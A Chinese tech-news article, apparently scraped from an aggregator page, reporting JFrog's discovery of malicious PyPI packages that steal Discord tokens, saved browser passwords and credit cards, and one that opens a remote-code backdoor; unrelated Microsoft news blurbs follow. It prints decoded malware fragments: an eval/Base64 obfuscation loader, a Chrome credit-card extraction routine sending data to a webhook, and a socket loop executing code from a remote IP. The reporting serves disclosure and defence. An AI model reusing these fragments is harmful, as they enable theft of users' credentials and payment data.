范文健康探索娱乐情感热点
投稿投诉
热点动态
科技财经
情感日志
励志美文
娱乐时尚
游戏搞笑
探索旅游
历史星座
健康养生
美丽育儿
范文作文
教案论文
国学影视

Python程序员小心,PyPI软件库又双叒叕发现恶意软件,能盗取信用卡还有后门程序

  Python 程序员真的要小心了,PyPI 软件库问题真是越来越严重。
  继今年 6 月出现挖矿病毒后,PyPI 最近再次出现了一批恶意软件,
  JFrog 安全团队发现,PyPI 库中有多个软件存在盗取信用卡信息、远程注入代码的行为,而这些软件总共被下载了 3 万次。
  这些被发现问题的恶意软件分别是:
  当程序员安装完这些软件后,它们将在后台不知不觉读取浏览器文件夹,从而盗取信用卡信息和密码。它们是如何窃取信用卡信息的
  安全研究人员发现,上述所有软件包都使用 Base64 编码进行伪装。
  比如上述的 noblesse2:
  importbase64,codecs
  magic="aW1wb3J0IGNvbG9yYW1hLCBkYXRldGltZS..."
  love="0iLKOcY3L4Y2q1nJkxpl97nJE9Y2EyoTI0M..."
  god="a2luZy5hcHBlbmQodG9rZW4pDQogICAgICAg..."
  destiny="yxIKAVDaAQK3xjpQWkqRAboUcBIzqjEmS..."
  joy="\x72\x6f\x74\x31\x33"
  trust=eval("\x6d\x61\x67\x69\x63")+eval("\x63\x6f\x64\x65\x63\x73\x2e\x64...")
  eval(compile(base64.b64decode(eval("\x74\x72\x75\x73\x74")),"","exec"))
  这种方法可以欺骗一些简单的分析工具,但是仔细研究可以发现其中的问题。
  以上 8 个软件包分别包含了以下不同种类的恶意行为:
  1、窃取 Discord 帐户身份验证 token
  Discord 身份验证 token 读取器的代码非常简单,它就是一组硬编码的路径:
  local=os.getenv("LOCALAPPDATA")
  roaming=os.getenv("APPDATA")
  paths={
  "Discord":roaming+"\\Discord",
  "DiscordCanary":roaming+"\\discordcanary",
  "DiscordPTB":roaming+"\\discordptb",
  "GoogleChrome":local+"\\Google\\Chrome\\UserData\\Default",
  "Opera":roaming+"\\OperaSoftware\\OperaStable",
  "Brave":local+"\\BraveSoftware\\Brave-Browser\\UserData\\Default",
  "Yandex":local+"\\Yandex\\YandexBrowser\\UserData\\Default"
  }
  然后代码会读取这几种浏览器路径下的所有.log 和.ldb 文件,并查找 Discord 身份验证 token,结果通过 Webhook 上传到 Discord。
  2、窃取浏览器存储的密码或信用卡数据
  当你在浏览器中输入密码或信用卡数据时,一般都会跳出如下窗口,提示用户保存这些信息。
  虽然这给用户带来方便,今后不用一遍遍输入密码,但缺点是这些信息可能会恶意软件获取。
  在这种情况下,恶意软件会尝试从 Chrome 窃取信用卡信息:
  defcs():
  master_key=master()
  login_db=os.environ["USERPROFILE"]+os.sep+\
  r"AppData\Local\Google\Chrome\UserData\default\WebData"
  shutil.copy2(login_db,
  "CCvault.db")
  conn=sqlite3.connect("CCvault.db")
  cursor=conn.cursor()
  try:
  cursor.execute("SELECT*FROMcredit_cards")
  forrincursor.fetchall():
  username=r[1]
  encrypted_password=r[4]
  decrypted_password=dpw(
  encrypted_password,master_key)
  expire_mon=r[2]
  expire_year=r[3]
  hook.send(f"CARD-NAME:"+username+"\nNUMBER:"+decrypted_password+"\nEXPIRYM:"+str(expire_mon)+"\nEXPIRYY:"+str(expire_year)+"\n"+"*"*10+"\n")
  这些信息和前一种情况一样会通过 Webhook 上传。
  3、收集有关受感染 PC 的信息:如 IP 地址、计算机名称和用户名
  除此之外,这些软件还会收集 Windows 许可证密钥信息、Windows 版本以及屏幕截图。
  4、远程代码注入
  pytagora 和 pytagora2 这两个恶意软件会尝试连接到某个 IP 地址 9009 端口上的,然后执行 Socket 中可用的任何 Python 代码。
  其中混淆的代码被安全人员解码成如下片段:
  importsocket,struct,time
  s=socket.socket(2,socket.socket.socket.SOCK_STREAM)
  s.connect(("172.16.60.80",9009))
  l=struct.unpack(">I",s.recv(4))[0]
  print(l)
  d=s.recv(l)
  print(d)
  whilelen(d)>!1:
  d+=s.recv(l-len(d))
  print(d)
  exec(d,{"s":s})
  但是安全人员现在不知道这个 IP 地址是什么,或者上面是否存在恶意软件。中毒后如何挽救
  如果你发现自己的电脑已经安装了诸如 noblesse 的恶意软件,那么请检查一下你的浏览器到底保存了哪些密码,这些密码可能已经泄露,请尽快修改。
  对于 Edge 浏览器用户,请在地址栏中输入 edge://settings/passwords,查看已保存的密码。
  对于 Chrome 浏览器用户,请在地址栏中输入 chrome://settings/payments,在付款方式一栏下查看已保存的信用卡信息。
  另外可以松口气的是,PyPI 维护人员已经删除了这些恶意软件包。
  虽然 PyPI 软件库现在是安全了,但是鉴于这些开源软件库现在的维护状态,未来很可能还会遇到更多攻击。今年 PyPI 库出现安全问题的状况就不止一次出现。
  "攻击者能够使用简单的混淆技术来引入恶意软件,这意味着开发人员必须保持警惕。"
  JFrog CTO 说,"这是一个系统性威胁,需要由软件存储库的维护者和开发人员在多个层面积极解决。"

微软亲自演示黑客入侵,告诉你Win11的TPM2。0有多重要IT之家10月11日消息微软的新Windows11系统有大量基于安全的功能,比如可信平台模块(TPM2。0)基于虚拟化的安全性(VBS)等等,这些功能虽然安全,但导致了一些严格的系微软解释为何不在Win11任务栏时钟上显示秒数IT之家4月17日消息,在Windows10系统中,用户可通过注册表值ShowSecondsInSystemClock手动开启任务栏的时钟秒数,而在Windows11中则取消了这一又一款Vidar恶意软件曝光,伪装成微软客户支持和帮助文件窃取用户信息IT之家4月16日消息,据Neowin报道,网络安全公司Trustwave的安全团队SpiderLabs已警告Windows用户注意一项名为Vidar的新恶意软件,该软件将自己伪装微软承诺将积极研究维修权问题IT之家10月8日消息据Grist和股东权益组织AsYouSow报道,微软已经同意让一个独立的第三方公司研究使其设备更容易维修的潜在影响,并在2022年底前根据这些发现做出改变。该微软收购生产力工具创企Ally。io,将引入Microsoft云中北京时间10月8日上午消息,微软宣布收购了Ally。io,这是一家开发仪表板和可定制工具的初创公司,可以帮助员工了解他们是否实现了目标。据透露,Ally。io的仪表板和可定制工具将微软将发布基于区块链的数字身份系统IT之家10月7日消息早在2018年,微软就宣布,它正在致力于通过区块链等分散技术创建数字身份。该技术是向所有人提供一个数字自有身份,以私人和安全的方式存储有关他们的所有信息,并让Win11VBS安全功能导致性能下降,教你如何检测并关闭IT之家10月7日消息微软Windows11操作系统已经正式发布,但是根据ULbenchmarks公司的报告,该系统默认开启的VirtualizationbasedSecurity微软Surface应用更新(61。60。139。0)全新设计,支持SurfacePen感谢IT之家网友LJL龙威的线索投递!IT之家10月7日消息据IT之家网友LJL龙威ThinkBou左脚右腿投稿,微软为其Surface应用推送了一个更新,更新后该应用的版本号为6AMD证实部分Ryzen芯片组在Win11正式版系统上性能会大幅下降IT之家10月7日消息基准测试显示,与Windows10相比,Windows11的性能普遍有所提高,但今天AMD警告说,对于其Ryzen芯片组,可能会出现完全相反的情况,一些芯片的教程如何在不符合最低系统要求的电脑上安装Win11正式版IT之家10月7日消息早在8月,微软就披露了运行Windows11的最低系统要求。由于可信平台模块(TPM)2。0版本的要求,一些比较新的Windows10电脑变得不符合Windo壹号本PC游戏掌机ONEXPLAYER开启众筹内置键盘,运行Win10系统IT之家5月11日消息尽管微软从未进入该领域,但运行Windows的掌上游戏机社区仍在蓬勃发展。壹号本PC游戏掌机ONEXPLAYER现已在INDIEGOGO开启众筹,预计将于20
Win1020H2推送KB5000842累积更新,解决资源管理器等BugIT之家3月30日消息微软今日为Windows1020H2Build19042。906以及2004版本推送KB5000842累积更新,属于每月的例行更新,修复了多项Bug,主要解决微软Edge浏览器恢复DNSoverHTTPS功能,增强安全和隐私IT之家3月20日消息根据外媒mspoweruser消息,微软近日为所有版本的Edge浏览器恢复了DNSoverHTTPS功能(以下简称DoH)。在2021年2月,因为开启该功能会火狐Firefox86浏览器将取消退格键作为后退按钮使用IT之家1月17日消息外媒ZdNet报道,Mozilla以意外数据丢失为由,将移除Firefox浏览器中的Backspace退格键导航。Mozilla开发者计划取消对在Firefo开发者称哔哩哔哩动画Win10UWP客户端已由B站官方团队接手IT之家12月25日消息从2016年开始,哔哩哔哩动画Windows10UWP官方客户端正式上线微软应用商店,由暗影吉他手开发。哔哩哔哩弹幕网是国内知名的弹幕视频分享网站,常被动漫微软Win10叨扰快把Chromium版Edge设置为默认浏览器IT之家10月5日消息外媒WindowsLatest报道,2018年底,微软宣布放弃基于EdgeHTML的微软Edge浏览器,并将用采用为Chrome提供支持的Chromium核心微软中国区换帅任命侯阳博士为大中华区董事长兼首席执行官感谢IT之家网友YOGA品质人生的线索投递!IT之家3月1日消息据微软中国官网消息,微软公司于今日宣布,侯阳博士将接替柯睿杰(AlainCrozier)担任微软大中华区董事长兼首席微软SurfaceLaptop4双版本跑分曝光搭载英特尔TigerLakeU和AMDCPUIT之家3月1日消息外媒WindowsLatest报道,根据新的基准跑分列表,微软可能计划在2021年4月推出SurfaceLaptop4新品,搭载Surface版AMD处理器和英Win10新工具曝光即时杀死应用进程IT之家11月20日消息Windows10可能会有一种新的方式来终止应用进程,而无需打开任务管理器。这个想法是一个简化版的任务管理器,将允许用户杀死占用过多内存的应用进程或程序。W微软Win10Dev预览版Build20262发布(附更新内容及已知问题)IT之家11月19日消息微软今天发布了Windows10Dev预览版Build20262,属于FERELEASE开发分支,它不同于WindowsInsider团队在5月份开始使用的微软WinUI3预览版3最新支持ARM64,新增拖放等功能IT之家11月18日消息微软今天宣布发布WinUI3。0预览版3。WinUI是微软用于构建Windows应用程序的最先进的用户界面技术。WinUI3是一个UI层,它采用了解耦的UW微信Windows3。1。0测试版发布群聊设置备注,聊天列表不显示某个聊天IT之家12月4日消息腾讯微信团队近期发布了Windows微信3。1。0测试版,带来了几个新的功能。IT之家获悉,本次更新新增群聊设置备注,聊天列表中不显示某个聊天,群里进行最多1